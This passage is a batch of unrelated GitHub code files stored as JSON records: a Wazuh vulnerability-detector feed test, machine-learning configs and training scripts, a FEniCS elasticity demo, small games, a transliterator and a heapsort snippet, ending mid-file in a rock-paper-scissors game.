+{"seq_id":"28181856033","text":"import itertools\nimport os\n\nimport pytest\nimport wazuh_testing.vulnerability_detector as vd\nfrom wazuh_testing.tools import LOG_FILE_PATH\nfrom wazuh_testing.tools.configuration import load_wazuh_configurations\nfrom wazuh_testing.tools.file import truncate_file, read_json_file, write_json_file\nfrom wazuh_testing.tools.monitoring import FileMonitor\nfrom wazuh_testing.tools.services import control_service\n\n# Marks\npytestmark = pytest.mark.tier(level=2)\n\n# Variables\ncurrent_test_path = os.path.dirname(os.path.realpath(__file__))\ntest_data_path = os.path.join(current_test_path, '..', '..', 'data')\nconfigurations_path = os.path.join(test_data_path, 'configuration', 'test_feeds', vd.INVALID_MSU_FEEDS_CONF)\ncustom_msu_json_feed_path = os.path.join(test_data_path, 'feeds', vd.CUSTOM_MSU_JSON_FEED)\n\nwazuh_log_monitor = FileMonitor(LOG_FILE_PATH)\n\n# Set configuration\nparameters = [{'MSU_JSON_PATH': custom_msu_json_feed_path + \"$\"}]\nids = ['MSU_configuration']\n\n# MSU fields to check\ntest_data = [\n    {\"field\": \"patch\", \"type\": [str, int, list]},\n    {\"field\": \"product\", \"input\": \"\", \"type\": [str, int, list]},\n    {\"field\": \"restart_required\", \"type\": [str, int, list]},\n    {\"field\": \"subtype\", \"type\": [str, int, list]},\n    {\"field\": \"title\", \"type\": [str, int, list]},\n    {\"field\": \"url\", \"type\": [str, int, list]}\n]\n\ntest_data_ids = [f\"field: {item['field']}, value:{value}\" for item in test_data for value in\n                 vd.CUSTOM_INPUT_TEST_VALUES]\n\n# Configuration data\nconfigurations = load_wazuh_configurations(configurations_path, __name__, params=parameters)\n\n\n@pytest.fixture(scope='module', params=configurations, ids=ids)\ndef get_configuration(request):\n    \"\"\"Get configurations from the module.\"\"\"\n    return request.param\n\n\n@pytest.fixture\ndef modify_feed(test_data, custom_input, request):\n    \"\"\"\n    Modify the MSU feed, setting a test field value\n    \"\"\"\n    backup_data = read_json_file(custom_msu_json_feed_path)\n\n    data = read_json_file(custom_msu_json_feed_path)\n\n    modified_data = dict(data['vulnerabilities']['CVE-010'][0])\n\n    modified_data[test_data['field']] = custom_input\n\n    data['vulnerabilities']['CVE-010'][0] = modified_data\n\n    write_json_file(custom_msu_json_feed_path, data)\n\n    vd.clean_vuln_and_sys_programs_tables()\n\n    control_service('restart', daemon='wazuh-modulesd')\n\n    vd.set_system(system='Windows10')\n\n    yield\n\n    write_json_file(custom_msu_json_feed_path, backup_data)\n\n    vd.clean_vuln_and_sys_programs_tables()\n\n    truncate_file(LOG_FILE_PATH)\n\n\ndef test_no_feed_changes(clean_vuln_tables, get_configuration, configure_environment, restart_modulesd):\n    \"\"\"Check if the feed is imported successfully by default\"\"\"\n    vd.check_feed_imported_successfully(wazuh_log_monitor=wazuh_log_monitor, log_system_name=vd.MSU_LOG,\n                                        expected_vulnerabilities_number=0)\n\n\n@pytest.mark.parametrize('test_data, custom_input', itertools.product(test_data, vd.CUSTOM_INPUT_TEST_VALUES),\n                         ids=test_data_ids)\ndef test_invalid_values_msu_feed(test_data, custom_input, clean_vuln_tables, get_configuration, configure_environment,\n                                 modify_feed):\n    \"\"\"\n    Check if the vulnerability detector behaves 
as expected when importing MSU feed with wrong field values\n \"\"\"\n # If the field is \"key\" and the input type is not the field type, then look for error messages\n vd.check_feed_imported_successfully(wazuh_log_monitor=wazuh_log_monitor, log_system_name=vd.MSU_LOG,\n expected_vulnerabilities_number=0)\n\n vd.check_if_modulesd_is_running()\n","repo_name":"kargil-thakur/wazuh-qa","sub_path":"tests/integration/test_vulnerability_detector/test_feeds/msu/test_invalid_values_msu_feed.py","file_name":"test_invalid_values_msu_feed.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"22039655357","text":"import torch\n\nclass SchedulerConfig:\n def __init__(self):\n # STARTS from lr goes down to eta_min in T_0 \n self.CosineAnnealingWarmRestarts = {'T_0': 10, 'T_mult': 1, 'eta_min': 0.0005}\n self.StepLR = {'step_size': 10, 'gamma': 0.1}\n self.ExponentialLR = {'gamma': 0.95}\n\n #steps_per_epoch should be set to number of batches , epochs should be total number of epochs \n # Starts from low lr to max lr \n self.OneCycleLR = {'max_lr': 0.01, 'steps_per_epoch': 10, 'epochs': 20} \n\n self.CyclicLR = {'base_lr': 0.001, 'max_lr': 0.01, 'step_size_up': 5,'step_size_down':5, 'mode': 'triangular'} \n\n def get_params(self, scheduler_name):\n return getattr(self, scheduler_name, None)\n\nnum_features = 3\ntarget_name = '평균기온'\n\nclass Config:\n def __init__(self):\n # ==================== Task name ================ #\n self.task_name = 'short_term_forecast'\n # Output features and c_out should be the same when the task is anomaly_detection\n\n # =================== Datasets Shape================== #\n self.seq_len = 365\n self.window_shift = 1\n self.enc_in = num_features # Features\n\n # ================== MODEL ====================== #\n self.d_model = 20 # Embedding dimension\n self.top_k = 3 # FFT frequency\n self.d_ff = 20 # Output layer dimension\n self.num_kernels = 6 # inception block에서 / If using dcvn set it to 3\n self.dropout = 0.1 # Dropout rate\n self.e_layers = 1 # num Timeblock\n self.label_len = num_features # Features\n\n self.target_col = target_name # Name of target column\n self.cnn_type = 'inceptionv1' # dcvn, inceptionv1, inceptionv2, res_dcvn, res_inceptionv1, res_inceptionv2\n\n # ================= Output shape ================= #\n self.pred_len = 358 # Prediction length\n self.c_out = 1 # Output feature\n\n # ================= Scheduler Configurations ========= #\n self.scheduler_config = SchedulerConfig()\n self.scheduler_name = 'CosineAnnealingWarmRestarts' #'CosineAnnealingWarmRestarts', 'StepLR', 'ExponentialLR', 'OneCycleLR', 'CyclicLR'\n self.scheduler_update_type = 'batch' # epoch, batch \n\nconfigs = Config()\n","repo_name":"edwardhan925192/TimesNet","sub_path":"times_config.py","file_name":"times_config.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1059592519","text":"# from opsoro.hardware import Hardware\nimport math\nimport random\nimport time\n\nfrom scipy import interpolate\n\nfrom opsoro.animate import Animate\nfrom opsoro.console_msg import *\n\n\ndef constrain(n, minn, maxn): return max(min(maxn, n), minn)\n\n\nclass DOF(object):\n def __init__(self, name, neutral=0.0, poly=None):\n \"\"\"\n DOF class.\n\n :param string name: name of the DOF.\n :param float neutral: neutral dof position.\n :param list poly: 20 dof values linked to emotions.\n \"\"\"\n\n 
self.name = name\n self.tags = []\n self.value = neutral\n self.to_value = neutral\n\n # Dict to store any extra data from YAML files\n self.data = {}\n\n # # List of overlay functions\n # # def my_overlay(dofpos, dof):\n # # new_dof_pos = dofpos\n # # return my_new_pos\n # self.overlays = []\n\n self._neutral = None\n self._interp_poly = None\n\n self._anim = None\n\n # Update control polygon\n self.set_control_polygon(neutral, poly)\n\n self.last_set_time = int(round(time.time() * 1000))\n self.last_set_value = neutral\n\n def config(self, **args):\n pass\n\n def __repr__(self):\n return \"DOF(name=%s, neutral=%.2f, poly={...})\" \\\n % (self.name, self._neutral)\n\n def set_control_polygon(self, neutral=0.0, poly=None):\n \"\"\"\n Sets the control polygon, 20 dof values are linked to certain emotions.\n\n :param float neutral: neutral dof position.\n :param list poly: 20 dof values linked to emotions.\n \"\"\"\n\n self._neutral = constrain(neutral, -1.0, 1.0)\n\n if poly is None or len(poly) == 0:\n self._interp_poly = lambda x: self._neutral\n else:\n dofs = map(lambda x: float(x), poly)\n\n # Fixed phis, this is currently always the same\n phis = [\n -3.1415926535897931, -2.8108986900540254, -2.4802047265182576,\n -2.1495107629824899, -1.8188167994467224, -1.4881228359109546,\n -1.1574288723751871, -0.82673490883941936,\n -0.49604094530365161, -0.16534698176788387,\n 0.16534698176788387, 0.49604094530365161, 0.82673490883941891,\n 1.1574288723751867, 1.4881228359109544, 1.8188167994467221,\n 2.1495107629824899, 2.4802047265182576, 2.8108986900540254,\n 3.1415926535897931\n ]\n # Sort lists\n indexes = range(len(phis))\n sorted_dofs = map(dofs.__getitem__, indexes)\n\n # Create interpolation instance\n self._interp_poly = interpolate.interp1d(phis, sorted_dofs, kind=\"linear\")\n\n def calc(self, r, phi, anim_time=-1):\n \"\"\"\n Calculate dof value with the polygon, according to the given r and phi.\n\n :param float r: radius r, intensity of the emotion.\n :param float phi: (radians) angle of the emotion in the circumplex.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n \"\"\"\n # print_info('Calc; r: %d, phi: %d, time: %i' % (r, phi, anim_time))\n # Calculate DOF position at max intensity\n\n if phi > 0:\n phi -= math.pi\n elif phi <= 0:\n phi += math.pi\n\n dof_at_max_r = float(self._interp_poly(phi))\n\n # Interpolate between neutral DOF pos and max intensity DOF pos\n self.set_value(float(self._neutral) + (r * (dof_at_max_r - float(self._neutral))), anim_time)\n\n # # Execute overlays\n # for overlay_fn in self.overlays:\n # try:\n # self.set_value(overlay_fn(self.value, self), anim_time)\n # except TypeError:\n # # Not a callable object, or function does not take 2 args\n # pass\n\n def set_value(self, dof_value=0, anim_time=-1, is_overlay=False, update_last_set_time=True):\n \"\"\"\n Sets the dof value. 
If the dof value is 2 or larger, set it to a random value.\n\n :param float dof_value: new value of the dof.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n :param bool is_overlay: used to determine what priority the dof value has (overlay > default).\n :param bool update_last_set_time: update the last set timer of the dof.\n \"\"\"\n # print_info('Set value: %d, time: %i' % (dof_value, anim_time))\n if dof_value >= 2:\n dof_value = random.uniform(-1, 1)\n dof_value = float(constrain(float(dof_value), -1.0, 1.0))\n self.to_value = dof_value\n\n # Apply transition animation\n if anim_time < 0:\n anim_time = float(abs(dof_value - float(self.value))) / 1.0\n\n self._anim = Animate([0, anim_time], [self.value, dof_value])\n\n if not is_overlay:\n self.last_set_value = dof_value\n\n if update_last_set_time:\n self.last_set_time = int(round(time.time() * 1000))\n\n def set_overlay_value(self, dof_value=0, anim_time=-1, update_last_set_time=True):\n \"\"\"\n Sets the overlay value and overwrites the dof position.\n\n :param float dof_value: new overlay value of the dof.\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n :param bool update_last_set_time: update the last set timer of the dof.\n \"\"\"\n self.set_value(dof_value, anim_time, True, update_last_set_time)\n\n def reset_overlay(self, anim_time=-1):\n \"\"\"\n Clears the overlay value and resets the dof position to the last set value.\n\n :param float anim_time: time for the servo to move from previous dof to the new dof (-1: animation will be based on dof differences).\n \"\"\"\n\n self.set_value(self.last_set_value, anim_time)\n\n def update(self):\n \"\"\"\n Updates the dof value according to the animation.\n\n :return: True if dof value is updated, False if dof value did not change.\n :rtype: bool\n \"\"\"\n if self._anim is not None:\n self.value = float(self._anim())\n if self._anim is None or self._anim.has_ended():\n self._anim = None\n return True\n return False\n\n # def add_overlay(self, fn):\n # self.overlays.append(fn)\n #\n # def remove_overlay(self, fn):\n # self.overlays.remove(fn)\n #\n # def clear_overlays(self):\n # self.overlays = []\n","repo_name":"OPSORO/OS","sub_path":"src/opsoro/dof/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"1111028056","text":"import os\nimport numpy as np\nimport random\nimport argparse\nimport mxnet as mx\nimport logging\nimport gluonnlp as nlp\n\nfrom ner_utils import get_context, str2bool, get_ernie_model, dump_metadata\nfrom data import ERNIETaggingDataset, convert_arrays_to_text\nfrom model import ERNIETagger, attach_prediction\n\n# seqeval is a dependency that is specific to named entity recognition.\nimport seqeval.metrics\n\nlogging.getLogger().setLevel(logging.DEBUG)\n\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Train a ERNIE-based named entity recognition model',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # data file paths\n arg_parser.add_argument('--train-path', type=str, default=\"./data/english_good_name/train.txt\",\n help='Path to the training data file')\n arg_parser.add_argument('--dev-path', type=str, default=\"./data/english_good_name/dev.txt\",\n help='Path to the 
development data file')\n arg_parser.add_argument('--test-path', type=str, default=\"./data/english_good_name/test.txt\",\n help='Path to the test data file')\n\n arg_parser.add_argument('--save-checkpoint-prefix', type=str, default=\"./model/english_good_name/model\",\n help='Prefix of model checkpoint file')\n\n # bert options\n arg_parser.add_argument('--ernie-model', type=str, default='bert_12_768_12',\n help='Name of the ERNIE model')\n arg_parser.add_argument('--cased', type=str2bool, default=False,\n help='Path to the development data file')\n arg_parser.add_argument('--dropout-prob', type=float, default=0.1,\n help='Dropout probability for the last layer')\n\n # optimization parameters\n arg_parser.add_argument('--seed', type=int, default=13531,\n help='Random number seed.')\n arg_parser.add_argument('--seq-len', type=int, default=256,\n help='The length of the sequence input to BERT.'\n ' An exception will raised if this is not large enough.')\n arg_parser.add_argument('--gpu', type=int, default=0,\n help='Number (index) of GPU to run on, e.g. 0. '\n 'If not specified, uses CPU.')\n arg_parser.add_argument('--batch-size', type=int, default=16, help='Batch size for training')\n arg_parser.add_argument('--num-epochs', type=int, default=10, help='Number of epochs to train')\n arg_parser.add_argument('--optimizer', type=str, default='adam',\n help='Optimization algorithm to use')\n arg_parser.add_argument('--learning-rate', type=float, default=5e-5,\n help='Learning rate for optimization')\n arg_parser.add_argument('--warmup-ratio', type=float, default=0.1,\n help='Warmup ratio for learning rate scheduling')\n args = arg_parser.parse_args()\n return args\n\ndef main(config):\n ctx = get_context(0)\n\n ernie_model, vocab = get_ernie_model(args.ernie_model, args.cased, ctx, args.dropout_prob)\n tag_list = [\"EN-B\", \"EN-I\", \"O\"]\n\n dataset = ERNIETaggingDataset(text_vocab=vocab, train_path=config.train_path, dev_path=config.dev_path,\n test_path=config.test_path, seq_len=config.seq_len, is_cased=config.cased,\n tag_list=tag_list)\n train_data_loader = dataset.get_train_data_loader(config.batch_size)\n dev_data_loader = dataset.get_dev_data_loader(config.batch_size)\n test_data_loader = dataset.get_test_data_loader(config.batch_size)\n\n net = ERNIETagger(ernie_model, dataset.num_tag_types, config.dropout_prob)\n net.tag_classifier.initialize(init=mx.init.Normal(0.02), ctx=ctx)\n net.hybridize(static_alloc=True)\n\n #loss\n loss = mx.gluon.loss.SoftmaxCrossEntropyLoss()\n loss.hybridize(static_alloc=True)\n\n setp_size = config.batch_size\n max_num_train_steps = (int(len(dataset.train_inputs)) * config.num_epochs) / setp_size\n num_wramup_steps = int(max_num_train_steps * config.warmup_ratio)\n\n #optimizer\n optimizer_params = {\"learning_rate\": config.learning_rate}\n trainer = mx.gluon.Trainer(net.collect_params(), config.optimizer, optimizer_params)\n\n # collect differentiable parameters\n logging.info('Collect params...')\n # do not apply weight decay on LayerNorm and bias terms\n for _, v in net.collect_params('.*beta|.*gamma|.*bias').items():\n v.wd_mult = 0.0\n params = [p for p in net.collect_params().values() if p.grad_req != 'null']\n\n if config.save_checkpoint_prefix is not None:\n logging.info('dumping metadata...')\n dump_metadata(config, tag_vocab=dataset.tag_vocab)\n\n def train(data_loader, start_step_num):\n \"\"\"Training loop.\"\"\"\n step_num = start_step_num\n # logging.info('current starting step num: %d', step_num)\n for batch_id, (_, _, _, tag_ids, 
flag_nonnull_tag, out) in \\\n enumerate(attach_prediction(data_loader, net, ctx, is_train=True)):\n # logging.info('training on batch index: %d/%d', batch_id, len(data_loader))\n\n # step size adjustments\n #leearning_rate decay\n step_num += 1\n if step_num < num_wramup_steps:\n new_lr = config.learning_rate * step_num / num_wramup_steps\n else:\n offset = ((step_num - num_wramup_steps) * config.learning_rate /\n (max_num_train_steps - num_wramup_steps))\n new_lr = config.learning_rate - offset\n trainer.set_learning_rate(new_lr)\n\n with mx.autograd.record():\n loss_value = loss(out, tag_ids,\n flag_nonnull_tag.expand_dims(axis=2)).mean()\n\n loss_value.backward()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.step(1)\n\n pred_tags = out.argmax(axis=-1)\n # logging.info('loss_value: %6f', loss_value.asscalar())\n\n num_tag_preds = flag_nonnull_tag.sum().asscalar()\n logging.info(\n 'loss_value: %6f, accuracy: %6f', loss_value.asscalar(), (((pred_tags == tag_ids) * flag_nonnull_tag).sum().asscalar()\n / num_tag_preds))\n return step_num\n\n def evaluate(data_loader):\n \"\"\"Eval loop.\"\"\"\n predictions = []\n\n for batch_id, (text_ids, _, valid_length, tag_ids, _, out) in \\\n enumerate(attach_prediction(data_loader, net, ctx, is_train=False)):\n # logging.info('evaluating on batch index: %d/%d', batch_id, len(data_loader))\n\n # convert results to numpy arrays for easier access\n np_text_ids = text_ids.astype('int32').asnumpy()\n np_pred_tags = out.argmax(axis=-1).asnumpy()\n np_valid_length = valid_length.astype('int32').asnumpy()\n np_true_tags = tag_ids.asnumpy()\n\n predictions += convert_arrays_to_text(vocab, dataset.tag_vocab, np_text_ids,\n np_true_tags, np_pred_tags, np_valid_length)\n\n all_true_tags = [[entry.true_tag for entry in entries] for entries in predictions]\n all_pred_tags = [[entry.pred_tag for entry in entries] for entries in predictions]\n seqeval_f1 = seqeval.metrics.f1_score(all_true_tags, all_pred_tags)\n return seqeval_f1\n\n best_dev_f1 = 0.0\n last_test_f1 = 0.0\n best_epoch = -1\n\n last_epoch_step_num = 0\n for epoch_index in range(config.num_epochs):\n last_epoch_step_num = train(train_data_loader, last_epoch_step_num)\n train_f1 = evaluate(train_data_loader)\n dev_f1 = evaluate(dev_data_loader)\n if dev_f1 > best_dev_f1:\n best_dev_f1 = dev_f1\n best_epoch = epoch_index\n # logging.info('update the best dev f1 to be: %3f', best_dev_f1)\n test_f1 = evaluate(test_data_loader)\n logging.info('test f1: %3f', test_f1)\n last_test_f1 = test_f1\n\n # save params\n params_file = config.save_checkpoint_prefix + '_{:03d}.params'.format(epoch_index)\n # logging.info('saving current checkpoint to: %s', params_file)\n net.save_parameters(params_file)\n\n logging.info('epoch: %d, current_best_epoch: %d, train_f1: %3f, dev_f1: %3f, previous_best_dev f1: %3f',\n epoch_index, best_epoch, train_f1, dev_f1, best_dev_f1)\n\n # logging.info('current best epoch: %d', best_epoch)\n\n logging.info('best epoch: %d, best dev f1: %3f, test f1 at tha epoch: %3f',\n best_epoch, best_dev_f1, last_test_f1)\n\n\nif __name__ == \"__main__\":\n print(\"Ernie Ner\")\n args = parse_args()\n main(args)\n","repo_name":"wang91zhe/NER_Model","sub_path":"finetune_ernie.py","file_name":"finetune_ernie.py","file_ext":"py","file_size_in_byte":8903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"39578135542","text":"from engine import *\n\n\nclass Ship:\n def __init__(self):\n self.pos = engine.viewport / 2\n self.vel = 
Vector(0.0, 0.0)\n self.r = 10.0\n self.heading = 0.0\n self.boosting = False\n\n def update(self):\n self.pos += self.vel\n if not self.boosting:\n self.vel *= 0.9\n\n def boost(self):\n self.vel += Vector.from_angle(self.heading) * 0.0005\n self.boosting = True\n\n def rotate(self, rotation):\n self.heading += rotation\n\n def hits(self, asteroid):\n d = self.pos.dist(asteroid.pos)\n return d < self.r + asteroid.r\n\n def render(self):\n engine.push()\n\n engine.translate(self.pos)\n engine.rotate(self.heading + np.pi / 2)\n\n engine.fill = 0\n engine.stroke = 255\n engine.weight = 1\n\n angle = self.heading + np.pi / 2\n engine.triangle(Vector(-self.r, self.r), Vector(self.r, self.r), Vector(0, -self.r))\n\n if self.boosting:\n offset = self.r * 0.25\n engine.triangle(\n Vector(-self.r + offset, self.r),\n Vector(self.r - offset, self.r),\n Vector(0, self.r + offset),\n )\n self.boosting = False\n\n engine.pop()\n\n def edges(self):\n if self.pos.x > engine.width + self.r:\n self.pos.x = -self.r\n elif self.pos.x < -self.r:\n self.pos.x = engine.width + self.r\n\n if self.pos.y > engine.height + self.r:\n self.pos.y = -self.r\n elif self.pos.y < -self.r:\n self.pos.y = engine.height + self.r\n\n\nclass Laser:\n def __init__(self, ship):\n self.pos = ship.pos.copy()\n self.vel = ship.vel + Vector.from_angle(ship.heading) * 10.0\n\n def update(self):\n self.pos += self.vel\n\n def render(self):\n engine.push()\n\n engine.fill = 255\n engine.stroke = 255\n engine.weight = 4\n\n engine.circle(self.pos, 4)\n\n engine.pop()\n\n def hits(self, asteroid):\n d = self.pos.dist(asteroid.pos)\n return d < asteroid.r\n\n def off_screen(self):\n return (\n self.pos.x < 0\n or engine.width < self.pos.x\n or self.pos.y < 0\n or engine.height < self.pos.y\n )\n\n\nclass Asteroid:\n def __init__(self, pos=None, r=None):\n if pos is None:\n self.pos = random(engine.viewport)\n else:\n self.pos = pos.copy()\n self.vel = Vector.random(2)\n\n if r is None:\n self.r = random(15, 50)\n else:\n self.r = r * 0.5\n\n self.total = int(random(10, 30))\n self.offset = [random(-self.r * 0.25, self.r * 0.25) for _ in range(self.total)]\n\n def update(self):\n self.pos += self.vel\n\n def render(self):\n engine.push()\n\n engine.fill = None\n engine.stroke = 255\n engine.weight = 1\n\n engine.translate(self.pos)\n\n points = []\n for i, offset in enumerate(self.offset):\n angle = map(i, 0, self.total, 0, 2 * np.pi)\n points.append(Vector.from_angle(angle) * (self.r + offset))\n engine.polygon(*points)\n\n engine.pop()\n\n def breakup(self):\n return [Asteroid(self.pos, self.r), Asteroid(self.pos, self.r)]\n\n def edges(self):\n if self.pos.x > engine.width + self.r:\n self.pos.x = -self.r\n elif self.pos.x < -self.r:\n self.pos.x = engine.width + self.r\n\n if self.pos.y > engine.height + self.r:\n self.pos.y = -self.r\n elif self.pos.y < -self.r:\n self.pos.y = engine.height + self.r\n\n\nif __name__ == \"__main__\":\n engine.size(800, 600, OPENGL)\n\n ship = Ship()\n asteroids = [Asteroid() for _ in range(5)]\n lasers = []\n score = 0\n\n def gameover():\n global ship, asteroids, lasers, score\n ship = Ship()\n asteroids = [Asteroid() for _ in range(5)]\n lasers = []\n score = 0\n\n @engine.draw\n def draw():\n global score\n\n engine.background = 0\n\n for a in asteroids:\n if ship.hits(a):\n gameover()\n return\n a.update()\n a.edges()\n a.render()\n\n for l in lasers.copy():\n l.update()\n l.render()\n if l.off_screen():\n lasers.remove(l)\n else:\n for a in asteroids.copy():\n if l.hits(a):\n if a.r > 10:\n score 
+= 1\n                        asteroids.extend(a.breakup())\n                    asteroids.remove(a)\n                    lasers.remove(l)\n                    break\n\n        ship.update()\n        ship.edges()\n        ship.render()\n\n        engine.text(score, Vector(0, 0))\n\n    @engine.event\n    def key_pressed(e):\n        if e.key == \" \":\n            lasers.append(Laser(ship))\n\n    @engine.event\n    def key_held(e):\n        if e.key_code == \"right\":\n            ship.rotate(0.0001)\n        if e.key_code == \"left\":\n            ship.rotate(-0.0001)\n        if e.key_code == \"up\":\n            ship.boost()\n\n    engine.start()\n","repo_name":"Mimer29or40/PyEngine","sub_path":"src/CodingTrainOld/046 - Asteroids.py","file_name":"046 - Asteroids.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72294892669","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\ntr = {}\n\nfd = open('transcription.csv', 'r')\nfor line in fd.readlines():\n\tline = line.strip('\\n')\n\tq = line.split(',')\n\ttr[q[0]]=q[1]\n\n\n\ntext = sys.stdin.read()\n\n# apply the rules to the same string so that every replacement accumulates\ntrans_text = text\n\nfor k, v in tr.items():\n\ttrans_text = trans_text.replace(k,v)\n\nprint(trans_text)\n\n","repo_name":"janemurzinova/2017-osnov-programm","sub_path":"homework/transliterate.py","file_name":"transliterate.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14770229306","text":"\"\"\"\nFor a given array let:\n\n    Parent(i)=floor(i/2)\n    Left(i)=2i\n    Right(i)=2i+1\n\n    An array has the max heap property if:\n    array[ Parent(i) ] >= array[ i ]\n\n    We also say that the corresponding binary tree is a Max Heap\n\n    Notes:\n    --> In a Max Heap array A the element with the highest\n        value is in the root\n\n    --> The values of the elements lying on a root-leaf path\n        are monotonically decreasing\n\n    --> The height of the tree, i.e. the\n        length of the longest root-leaf path, is floor(log(n))\n\n\"\"\"\n\n\ndef max_heapify(array, root):\n    \"\"\"\n    Restore the max heap property in the subtree rooted at index `root`\n    (the array is 0-indexed, so Left(i)=2i+1 and Right(i)=2i+2)\n\n    :param array: list\n    :param root: integer, index of the subtree root\n    :return: the array, heapified at `root`\n    \"\"\"\n    i = root\n    n = len(array)\n    while True:\n        left_child = 2*i + 1\n        right_child = 2*i + 2\n\n        # find the largest of the node and its children\n        if left_child < n and array[left_child] > array[i]:\n            largest = left_child\n        else:\n            largest = i\n        if right_child < n and array[right_child] > array[largest]:\n            largest = right_child\n\n        if largest == i:\n            # heap property holds here, stop sifting down\n            return array\n        # swap with the larger child and continue from its position\n        array[i], array[largest] = array[largest], array[i]\n        i = largest\n\nprint(max_heapify([1, 2, 3, 4, 5], 0))\n\n","repo_name":"supenova1604/sorting","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10947693574","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 23 20:58:46 2019\n\n@author: daniel\n\"\"\"\n\n\"\"\"\nFEniCS tutorial demo program: Linear elastic problem.\n\n  -div(sigma(u)) = f\n  sigma(epsilon) = lambda*tr(epsilon)*I + 2*mu*epsilon\n  epsilon(u) = (1/2) * (grad(u) + transpose(grad(u)))\n\nThe model is used to simulate an elastic beam clamped at\nits left end and deformed under its own weight.\n\"\"\"\n\nimport fenics as fs\nimport matplotlib.pyplot as plt\n\n# scaled variables\nL = 1\nW = 0.2\nmu = 1\nrho = 1\ndelta = W / L\ngamma = 0.4 * delta**2\nbeta = 1.25\nlambda_ = beta\ng = 
gamma\n\n# Create mesh and define function space\nmesh = fs.BoxMesh(fs.Point(0, 0, 0), fs.Point(L, W, W), 10, 3, 3)\nV = fs.VectorFunctionSpace(mesh, 'P', 1)\n\n# define boundary condition\ntol = 1e-14\n\ndef clamped_boundary(x, on_boundary):\n    return on_boundary and x[0] < tol\n\nbc = fs.DirichletBC(V, fs.Constant((0, 0, 0)), clamped_boundary)\n\n# define strain and stress\ndef epsilon(u):\n    return 0.5 * (fs.nabla_grad(u) + fs.nabla_grad(u).T)\n\ndef sigma(u):\n    # lambda*tr(epsilon)*I + 2*mu*epsilon, with tr(epsilon) = div(u)\n    return lambda_*fs.nabla_div(u)*fs.Identity(d) + 2*mu*epsilon(u)\n\n# Define variational problem\nu = fs.TrialFunction(V)\nd = u.geometric_dimension()\nv = fs.TestFunction(V)\nf = fs.Constant((0, 0, -rho*g))\nT = fs.Constant((0, 0, 0))\na = fs.inner(sigma(u), epsilon(v))*fs.dx\nL = fs.dot(f, v)*fs.dx + fs.dot(T, v)*fs.ds\n\n# Compute solution\nu = fs.Function(V)\nfs.solve(a == L, u, bc)\n\n# Plot solution\nplt.figure()\nfs.plot(u, title='Displacement', mode='displacement')\n\n# Plot stress\ns = sigma(u) - (1./3)*fs.tr(sigma(u))*fs.Identity(d) # deviatoric stress\nvon_Mises = fs.sqrt(3./2*fs.inner(s, s))\nV = fs.FunctionSpace(mesh, 'P', 1)\nvon_Mises = fs.project(von_Mises, V)\nplt.figure()\nfs.plot(von_Mises, title='Stress intensity')\n\n# Compute magnitude of displacement\nu_magnitude = fs.sqrt(fs.dot(u, u))\nu_magnitude = fs.project(u_magnitude, V)\nplt.figure()\nfs.plot(u_magnitude, title='Displacement magnitude')\nprint('min/max u:', u_magnitude.vector().min(), u_magnitude.vector().max())\n\n# Save solution to file in VTK format\nfs.File('results/displacement.pvd') << u\nfs.File('results/von_mises.pvd') << von_Mises\nfs.File('results/magnitude.pvd') << u_magnitude","repo_name":"danielwboyce/fenicstutorials","sub_path":"db_ft06_elasticity/db_ft06_elasticity.py","file_name":"db_ft06_elasticity.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"2662402054","text":"from tkinter import *\r\nimport time\r\nimport random\r\n\r\n\r\ndef Play(player, ai):\r\n    global Draw\r\n    global AI_Score\r\n    global Player_Score\r\n    global Player_State\r\n    # Rock\r\n    if player == 'Rock' and ai == 'Rock':\r\n        Draw += 1\r\n        Player_State = 'Draw'\r\n    elif player == 'Rock' and ai == 'Paper':\r\n        AI_Score += 1\r\n        Player_State = 'Lose'\r\n    elif player == 'Rock' and ai == 'Scissor':\r\n        Player_Score += 1\r\n        Player_State = 'Win'\r\n    # Paper\r\n    elif player == 'Paper' and ai == 'Rock':\r\n        Player_Score += 1\r\n        Player_State = 'Win'\r\n    elif player == 'Paper' and ai == 'Paper':\r\n        Draw += 1\r\n        Player_State = 'Draw'\r\n    elif player == 'Paper' and ai == 'Scissor':\r\n        AI_Score += 1\r\n        Player_State = 'Lose'\r\n    # Scissor\r\n    elif player == 'Scissor' and ai == 'Rock':\r\n        AI_Score += 1\r\n        Player_State = 'Lose'\r\n    elif player == 'Scissor' and ai == 'Paper':\r\n        Player_Score += 1\r\n        Player_State = 'Win'\r\n    elif player == 'Scissor' and ai == 'Scissor':\r\n        Draw += 1\r\n        Player_State = 'Draw'\r\n    RPS = {'Rock': Rock_img,\r\n           'Paper': Paper_img,\r\n           'Scissor': Scissor_img}\r\n\r\n    return RPS[player], RPS[ai]\r\n\r\n\r\ndef random_ai():\r\n    AI = random.choice(['Rock', 'Paper', 'Scissor'])\r\n    return AI\r\n\r\n\r\ndef eye(element):\r\n    global eye_observer\r\n    RE_active = 